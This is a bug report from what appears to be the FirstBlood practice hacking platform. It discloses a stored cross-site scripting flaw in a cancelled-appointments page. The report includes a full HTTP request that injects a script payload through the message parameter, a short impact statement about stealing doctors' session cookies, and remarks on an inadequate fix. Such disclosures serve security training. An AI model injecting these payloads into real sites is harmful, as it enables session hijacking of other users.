FirstBlood-#533 — Stored XSS on /cancelled.php
This issue was discovered on FirstBlood v2
On 2021-10-26, 0x1452 Level 3 reported:
Hey!
I found a stored XSS on /cancelled.php
, caused by the unsanitized appointment message
that gets reflected on the page.
To reproduce this you first need to cancel any of your appointments with a malicious message
:
POST /api/ma.php HTTP/1.1
Host: b6a5124dc2a4-0x1452.a.firstbloodhackers.com
Cookie: drps=10f43143cf094d9363fc08ee7
Content-Length: 102
Sec-Ch-Ua: "Google Chrome";v="95", "Chromium";v="95", ";Not A Brand";v="99"
Csrf: 99215d4e-0ff3-4275
X-Site-Req: permitted
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://b6a5124dc2a4-0x1452.a.firstbloodhackers.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://b6a5124dc2a4-0x1452.a.firstbloodhackers.com/manageappointment.php?success&aptid=1f53ee02-c444-4104-8adf-19590b043cbe
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
act=cancel&id=1f53ee02-c444-4104-8adf-19590b043cbe&message=yo"><script>alert(document.domain)</script>
When a logged in doctor now navigates to /drpanel/cancelled.php
, the XSS will fire:
This was reported in the previous version and previously required some filter bypasses. In this version there isn't any filtering in place at all.
Impact
An attacker can cancel their appointment with a malicious message, allowing them to steal the session cookie of any doctor that visits the Cancelled Appointments page.
P2 High
Endpoint: /api/ma.php
Parameter: message
Payload: "><script>alert(document.domain)
FirstBlood ID: 22
Vulnerability Type: Stored XSS
Whilst an attempt was made to fix the stored XSS vulnerability in managing an appointment, it actually introduced new issues such as when creating and editing and not just when cancelling the appointment. Making use of htmlentities() and relying on .value() in javascript to encode certain characters does not prevent XSS overall. The 'fix' to this issue also results in it being vulnerable to admins on cancelled appointments as well.